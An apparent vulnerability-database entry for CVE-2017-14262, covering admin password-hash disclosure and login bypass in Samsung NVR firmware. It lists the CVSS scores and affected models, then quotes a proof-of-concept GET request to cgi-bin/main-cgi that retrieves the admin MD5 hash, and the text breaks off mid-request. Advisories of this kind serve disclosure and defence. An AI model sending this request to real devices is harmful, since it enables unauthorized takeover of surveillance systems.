CVE-2017-14262

Published: 11/09/2017 Updated: 03/10/2019
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.1 | Impact Score: 5.9 | Exploitability Score: 2.2
VMScore: 828
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and log in to the device with that hash in the szUserPasswd parameter.

Vulnerable Product

samsung srn_1670d_firmware -

samsung srn_1000_firmware -

samsung srn_472s_firmware -

samsung srn_470d_firmware -

Github Repositories

Samsung_NVR_vul

CVE-2017-14262

xfuturesec Co, Ltd

First, get the MD5 hash password of the 'admin' account

Send:

GET 192168114/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0} HTTP/1.1
Host: 192168114
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64